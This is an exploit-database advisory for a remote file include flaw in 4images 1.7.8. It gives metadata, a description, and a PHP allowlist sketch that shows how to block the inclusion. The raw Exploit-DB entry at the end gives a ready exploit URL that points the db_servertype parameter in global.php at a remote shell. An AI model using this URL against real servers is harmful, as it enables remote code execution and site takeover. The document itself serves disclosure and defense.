Vendor: 4images
By: LoSt.HaCkEr / aDaM_TRoJaN
CVSS: 7,5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: 4images
Affected Version From: 1.7.8
Affected Version To: 1.7.8
Patch Exists: NO
Related CWE: N/A
CPE: 4images
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
Year: 2010

4images 1.7.8 Remote File Include

A remote file include vulnerability exists in 4images 1.7.8 that allows an attacker to include a malicious file from a remote server. The vulnerability is in the 'global.php' file, where user input is not properly sanitized before being used to include a file. An attacker can exploit it by sending a specially crafted HTTP request that points the affected parameter at an arbitrary file on a remote server.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files from remote servers.
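
A sketch of the input validation this mitigation calls for, as an added example that is not taken from 4images or from the original advisory: the driver name is checked against a fixed allowlist before it is used in an include path. The function name, the driver list and the `includes/db_<name>.php` layout are assumptions made for illustration.

```php
<?php
// Added illustration, not 4images source code. All names are hypothetical.

// Drivers the application is assumed to ship (constructed list).
const ALLOWED_DB_DRIVERS = ['mysql', 'mysqli'];

/**
 * Map a requested driver name to a local include path, or throw.
 * The value reaches the path only if it is an exact member of the
 * allowlist, so URLs, stream wrappers, "../" sequences and NUL bytes
 * are all rejected without any pattern matching.
 */
function resolve_db_driver(string $requested, string $baseDir): string
{
    $name = strtolower($requested);
    if (!in_array($name, ALLOWED_DB_DRIVERS, true)) {
        throw new InvalidArgumentException('unsupported db driver');
    }
    return $baseDir . '/includes/db_' . $name . '.php';
}

// Generic form of the unsafe pattern the advisory describes
// (shown as a comment only): a request value used directly in include.
//   include $_GET['db_servertype'];

// Hardened pattern: the value comes from server-side configuration,
// never from the request, and still passes the allowlist check.
$config = ['db_servertype' => 'mysql'];   // constructed sample config
$path = resolve_db_driver($config['db_servertype'], __DIR__);
// require_once $path;   // enable where the driver files exist

// Constructed sample inputs showing what the check accepts and rejects.
$samples = ['mysql', 'MySQLi', 'http://example.invalid/x.txt', '../../config'];
foreach ($samples as $in) {
    try {
        $result = resolve_db_driver($in, __DIR__);
    } catch (InvalidArgumentException $e) {
        $result = 'rejected';
    }
    echo $in, ' -> ', $result, PHP_EOL;
}
```

Keeping `allow_url_include = Off` in php.ini (the PHP default) adds a second layer, since include and require then refuse URL targets even if a check like this is missed.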

Exploit-DB raw data:

# Exploit Title: [4images1.7.8 Remote File Include ] 
# Date: [23-8-2010] 
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Software Link: [http://www.4homepages.de/4images/download.php] 
# Version: [v 1.7.8 ] 
# Tested on: [Windows XP] 
# CVE : 
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers